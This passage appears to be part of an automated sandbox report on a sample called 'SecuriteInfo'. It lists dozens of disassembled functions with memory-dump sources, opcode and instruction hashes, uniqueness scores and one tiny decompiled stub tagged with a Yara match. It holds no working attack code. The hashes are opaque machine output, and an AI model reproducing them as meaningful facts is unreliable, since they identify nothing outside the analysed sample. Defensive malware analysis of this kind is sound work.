                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a293e901e5aae7d24974421fd8fa54f76546a31441db1f37f2671205eaf1d1b7
                                                        • Instruction ID: 733bfcacff06631a22ea310e02cb89987e211d1fdc5c5e16b4b3ede09a4457d8
                                                        • Opcode Fuzzy Hash: a293e901e5aae7d24974421fd8fa54f76546a31441db1f37f2671205eaf1d1b7
                                                        • Instruction Fuzzy Hash: F001A432E11358ABDB15DFBDC8059AEB7B8EF45710F4080AAF911EB280DA749A058791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01815AA0 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2029a114c36bb4c92c887f33788b343d8ca89f1f3266e36f8717b5269d555587
                                                        • Instruction ID: 719593a4adf386343b032b533d1b094fab363dc63e10cf1840076fa003cbc102
                                                        • Opcode Fuzzy Hash: 2029a114c36bb4c92c887f33788b343d8ca89f1f3266e36f8717b5269d555587
                                                        • Instruction Fuzzy Hash: 1501D13358165AAFD7229B1CC884F6E379CEB42720F008152FD14CB291DBB4EB408792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E3591 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d03d260d01ce357f0602aa94a8546785f0ff55cdf9f4f89ff7566860e2396e50
                                                        • Instruction ID: 58ff58d12cb702ad11c874fe9420741d5a1ba1a8894acae0d70df96cb42b81c1
                                                        • Opcode Fuzzy Hash: d03d260d01ce357f0602aa94a8546785f0ff55cdf9f4f89ff7566860e2396e50
                                                        • Instruction Fuzzy Hash: 08F0C271A01219ABEB25DB7E8854BAAFBE8EB98710F248255EE01D7340DA31E9408690
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0189FDD3 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f1d200cb2ce1fd20314d59cabd70055c940789c9024ab95fc7e6d460e8a305e
                                                        • Instruction ID: f0468ee162f86d7fc5e9be0f5e98d992ccd5be88e16ccf25ae4ef05524a5b896
                                                        • Opcode Fuzzy Hash: 8f1d200cb2ce1fd20314d59cabd70055c940789c9024ab95fc7e6d460e8a305e
                                                        • Instruction Fuzzy Hash: 62F0AF31B01258ABDB15EBA9D805A7EB7B4EF45700F440169FA01EB690EA30AA01C745
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E1BE9 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                        • Instruction ID: 3b1e6f3a9296507ab0058b214302d8a87540732ef05b386957904deee58a25f9
                                                        • Opcode Fuzzy Hash: 41b619a71a48c2b8fc4bd3b9482bbcb6548e364b6e99d490dbd24e33bd0f4c0c
                                                        • Instruction Fuzzy Hash: E8F02471714208ABE718CB29CC06B56F7EEEF9C300F1080B89949C7260FAB2ED21D354
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A131B Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78e1188d18720c2d953ee36b816615a55ceb261aea34a9a134dea9190cde23e8
                                                        • Instruction ID: dfdb37de9840d78889c5cc16c5098b9cbc7835cf2ac8c741dcdc08524d9e8d1f
                                                        • Opcode Fuzzy Hash: 78e1188d18720c2d953ee36b816615a55ceb261aea34a9a134dea9190cde23e8
                                                        • Instruction Fuzzy Hash: CC016971A0121CAFCB04EFA9D505AAEB7F4EF08300F404069F945EB381EA34AB00CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180C577 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57b30626db4c394df8ff24c31e792fe2c627ea640af2e5aec5b2c4a2d6616215
                                                        • Instruction ID: 043f53cec35d82b66fb8d9e2368eade7d31c644ba4cfd1592b9c1715abf1dadc
                                                        • Opcode Fuzzy Hash: 57b30626db4c394df8ff24c31e792fe2c627ea640af2e5aec5b2c4a2d6616215
                                                        • Instruction Fuzzy Hash: 1DF0F0BA81529C8FE7B38F1C8844B227FD8BB05730F4446EAF405C32C2D3A6CA80C241
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A2073 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9af81a70811dd6e10bc7cc9d88fc716550b387761059cec3eec6e62c665ef043
                                                        • Instruction ID: 0cd64f49a9a0f29839c85af76c8536bd98684208ba16b9ab1ee79e8069c96f65
                                                        • Opcode Fuzzy Hash: 9af81a70811dd6e10bc7cc9d88fc716550b387761059cec3eec6e62c665ef043
                                                        • Instruction Fuzzy Hash: D8F0A02A5662854BEF366B2C61017E23FD3D757310F8E0486D990D7209C5388B93CF21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182927A Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction ID: 96e7675994b11bade0212a331681e515f96e98c803435629fd3618cbf5f8ff03
                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                        • Instruction Fuzzy Hash: 03E02B323405116BE7129E0DCC80F03376DDF92724F014078FA009E282C6E5DE4887A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B8D34 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a8d63cbade05924eac9046bb7a4e6037edcb7ce2a00032f93b092d509f1c9ff
                                                        • Instruction ID: 17d584a011267b02c519275c336599c26d90ceae40a1f83f02ad6c0735ae946c
                                                        • Opcode Fuzzy Hash: 2a8d63cbade05924eac9046bb7a4e6037edcb7ce2a00032f93b092d509f1c9ff
                                                        • Instruction Fuzzy Hash: 84F09070A0561C9FDB14EBA8D441AAEB7B8AB14300F508099E905EB380EA34DA008B55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B8C14 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fa2f3d9456928cee8b0a4103d48f069629552073c31be7d367639f3c05f7b40
                                                        • Instruction ID: f17adb978277877b83718069282839de2fcb45b5ef536cfd948405e1348a9edc
                                                        • Opcode Fuzzy Hash: 2fa2f3d9456928cee8b0a4103d48f069629552073c31be7d367639f3c05f7b40
                                                        • Instruction Fuzzy Hash: FBF0B470A0521D9FDB14EFB8D942AAEB7B8FF15300F404459E905EB380EA34EA00CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B8C75 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 94e5c01722195ccde4e3db84626634fa260a5834a27877c347a6a7c61d7c80f3
                                                        • Instruction ID: ec1accf880ecdf6ab083b0593c8044475a698e479d63713bb2a5f8091172aa98
                                                        • Opcode Fuzzy Hash: 94e5c01722195ccde4e3db84626634fa260a5834a27877c347a6a7c61d7c80f3
                                                        • Instruction Fuzzy Hash: 79F0B470A1575D9FDB14EFB8D941E6EB7B8EF14300F004059E905DB380EA34DA00CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A1BA8 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a353d07679a98d56d17b7b3564046e49679fa6a8c8491971e0816d4aa971f28
                                                        • Instruction ID: 91ddc0f7311aaf6b50f62b7b9477c312b81f81172d4968930a03c6976e284d78
                                                        • Opcode Fuzzy Hash: 0a353d07679a98d56d17b7b3564046e49679fa6a8c8491971e0816d4aa971f28
                                                        • Instruction Fuzzy Hash: ABF08271A0525CAFDB14DBEDD84AAAE77B4EF08304F400099E905EB2C0E974DA40C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B8BB6 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b3ef2f93cb205cec6f99c288d61976b8a683425d00a17497b2d940176bc6716
                                                        • Instruction ID: 9c3437de227b94f0528a94482acee1b4290918db6e8e8060767041df3fc56e09
                                                        • Opcode Fuzzy Hash: 8b3ef2f93cb205cec6f99c288d61976b8a683425d00a17497b2d940176bc6716
                                                        • Instruction Fuzzy Hash: 88F05E70A0526DABDB14EBBCD946AAEB7B8EB04304F440459E955DB381EA34DA00C759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B8B58 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ad7a4dead28b6dd87c4c4dc329e8efdd4b492a1b015b89ae1309afe0f985b1a
                                                        • Instruction ID: 414577feb41e3cd0e27d6d615ae456a4dd4d70ccbd8a33159c97b6d10e420c5e
                                                        • Opcode Fuzzy Hash: 3ad7a4dead28b6dd87c4c4dc329e8efdd4b492a1b015b89ae1309afe0f985b1a
                                                        • Instruction Fuzzy Hash: 1DF082B0A0525DABDB14EBBCD946E6EB7B8EF04304F440459FA05DB3C1EA34DA00C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B8CD6 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 287e2923706fd81787cda8d1c031dd9d09d2cc516845271ccf3ce27a3cf8d8d1
                                                        • Instruction ID: b2d5063f8ac306b2e566dc9a9b8d56dcb5191d93b848a0ec1edde28c581f849b
                                                        • Opcode Fuzzy Hash: 287e2923706fd81787cda8d1c031dd9d09d2cc516845271ccf3ce27a3cf8d8d1
                                                        • Instruction Fuzzy Hash: 4AF0E270A0521DABCB04EBACD846EAE77B8EF19300F14019AE902EB3C0EA34DA00C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180746D Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cf5dc68fe3e0b2e9befbc73c22f8af4721454acb29b39da63ed9e5a0093760a
                                                        • Instruction ID: 58a28affd4f951c56f494acb983424f1e76c5abea61a7c5aaddfd586514bffd6
                                                        • Opcode Fuzzy Hash: 5cf5dc68fe3e0b2e9befbc73c22f8af4721454acb29b39da63ed9e5a0093760a
                                                        • Instruction Fuzzy Hash: BBF0B434B0094DAADF939B6CCCC0B79BF61AF04358F064119D5D1E71E1E724AA00C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E4F2E Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8998f530bffdda7d0d30e61591a798cd412c4d43ff4e463d0df998cfc179c0d5
                                                        • Instruction ID: 3f32609e4be823522f14a2549fd121c0e74c065b9f41231cdc120a3e904089f5
                                                        • Opcode Fuzzy Hash: 8998f530bffdda7d0d30e61591a798cd412c4d43ff4e463d0df998cfc179c0d5
                                                        • Instruction Fuzzy Hash: 8DF0E23252568C8FD772EF5CC184BA3B7D8AB04B78F4484B4F605C7A22CB24EE80C648
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E354C Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1316384a1fe986309cad5a59fd6b6bc372c6a06ba79fabd2add55ade94e5028e
                                                        • Instruction ID: 783203b38f00e863bfa0240f97cc1346529960be308695f49684248ab1db254b
                                                        • Opcode Fuzzy Hash: 1316384a1fe986309cad5a59fd6b6bc372c6a06ba79fabd2add55ade94e5028e
                                                        • Instruction Fuzzy Hash: 00F0E235D113C98FD722872CC044B21BBD8AB41B30F2A4075EA04CBA03C728CA80C6E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181A44B Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2369be90f167afde2c66cd3a0260d69c48f7b2d608e96a55de902251b9f9301
                                                        • Instruction ID: 52ab06445cba624ab0bd2fc2ad5661688b6b3bf8c994cb7b4fbf20b00d3af177
                                                        • Opcode Fuzzy Hash: f2369be90f167afde2c66cd3a0260d69c48f7b2d608e96a55de902251b9f9301
                                                        • Instruction Fuzzy Hash: 16E092B3A42421ABD2225A18EC40F6673ADDBE4B55F094035E605E7254D628DE01C7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017EF358 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction ID: b2dd302411533751174dc62e3cd23cbe82ac501ac059f37b9764d4f68328f9fa
                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction Fuzzy Hash: C1E0DF32A40118FBDB21AADD9E09FAAFFECDB98B60F000196FA04DB590D5609E00D2D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E15C1 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
                                                        • Instruction ID: d61b49fd80388ddc01f71381914197c0c83ef4506c02069f39aabcf345a6630f
                                                        • Opcode Fuzzy Hash: abd4c1e868dd77add1da121991445beedef88028e086df1525fa9b969b472fc7
                                                        • Instruction Fuzzy Hash: 39E0E53120014693CB32AA48C40ABB6F3D9AB99700F688071E402CB542D7709C41C3D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01825C70 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 315252d8d3e5e1fdd0d3f6bd8f50884039f61c830c14d95a10b54c942d48fd22
                                                        • Instruction ID: e3afa451c07f73d1f6edd8f6060e66b28e387624394f7da05565605ec1bd652c
                                                        • Opcode Fuzzy Hash: 315252d8d3e5e1fdd0d3f6bd8f50884039f61c830c14d95a10b54c942d48fd22
                                                        • Instruction Fuzzy Hash: AAE0DF71180258AFFB12DF08C844FA53FA9AF44720F00C114E609CB161D770DEC0CB06
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017FFF60 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 614e76d4958de71789d6a72b7418f718657cf9db2a85d38c998bdff5b614b520
                                                        • Instruction ID: 63b894308fca5cd1d4ff0910aac7aef41e4c3cbb40bce99a93592d2d795767b1
                                                        • Opcode Fuzzy Hash: 614e76d4958de71789d6a72b7418f718657cf9db2a85d38c998bdff5b614b520
                                                        • Instruction Fuzzy Hash: 37E0DFB2209204DFD736DF5AD880F27BBDC9B52721F19846DE2088B302CA21D880C286
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018741E8 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f12a8b2d0c9d7e0264d977a0f258daeba5143ad1a5a9980ab3fbefb35b53e456
                                                        • Instruction ID: f14ea35c827f8b040c4269d87b69c540441492f07fe6252c16e0477163aa6966
                                                        • Opcode Fuzzy Hash: f12a8b2d0c9d7e0264d977a0f258daeba5143ad1a5a9980ab3fbefb35b53e456
                                                        • Instruction Fuzzy Hash: 2EF01578922702EFCBB2EFADD50471477A4F796710F42811AD114C7288CB7487A4CF02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0189D380 Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction ID: d411e5b4b3846929c1be6f28801d4bce6b5d48a8cde42ddc492e77d26083e4ed
                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction Fuzzy Hash: E3E0C231280209FBDF325E88CC00F79BB56DB507A1F104031FE489A691CA75AE91E6C8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E2CDB Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
                                                        • Instruction ID: 77255a3d6bd0020a6ee2c0e276e0b022038286023e14d4f9d07fd4bde2972922
                                                        • Opcode Fuzzy Hash: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
                                                        • Instruction Fuzzy Hash: 54E0C231550220FFDB336B2CED08F62B6E9BF58710F110469F181850B6CB7199D1DB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181A185 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e30cae86ea78cec383db7d14732ea34e2061e071864ba801bc856cd5b88a8ce4
                                                        • Instruction ID: 6a7bc6fa7b1e56822267aafe326efe378f7a88dc0eeca2aecb11e292a0c05c85
                                                        • Opcode Fuzzy Hash: e30cae86ea78cec383db7d14732ea34e2061e071864ba801bc856cd5b88a8ce4
                                                        • Instruction Fuzzy Hash: F4D02B6212258C5AC72E5304CC14F21331AF7807A0F34040CF303CB5D9F9608BD8A109
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407B1A Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 16%
                                                        			E00407B1A(void* __eax, void* __ebx, void* __edi) {

				asm("movsb");
				asm("adc [ecx+0x58bf32b1], eax");
				return 1;
			}



                                                        0x00407b1e
                                                        0x00407b25
                                                        0x00407b3a

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f05b446a30e7b3e70ed0d9b3ae1b40bc8a727d98584a74e49e2a3373ecdd7a50
                                                        • Instruction ID: 5e68681c51bfaecc058ab8556dceaff3c6a63a9e4264af4b8dbf916919e6519f
                                                        • Opcode Fuzzy Hash: f05b446a30e7b3e70ed0d9b3ae1b40bc8a727d98584a74e49e2a3373ecdd7a50
                                                        • Instruction Fuzzy Hash: D6C08C32E6D0050AE214981D78002F8F7F8DBAB238F0823AFDC08FB201E08BC8974248
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018653CA Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                        • Instruction ID: 583ec3a3bf3c0953c9092ec9cdcaa3a6807ff6b53f6e79ea884daf4dd2dfb7fa
                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                        • Instruction Fuzzy Hash: 26E08C319006889BCF12DB4CCA50F4EBBF9FB45B80F150018A1089F661C624AE00CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017FAAB0 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
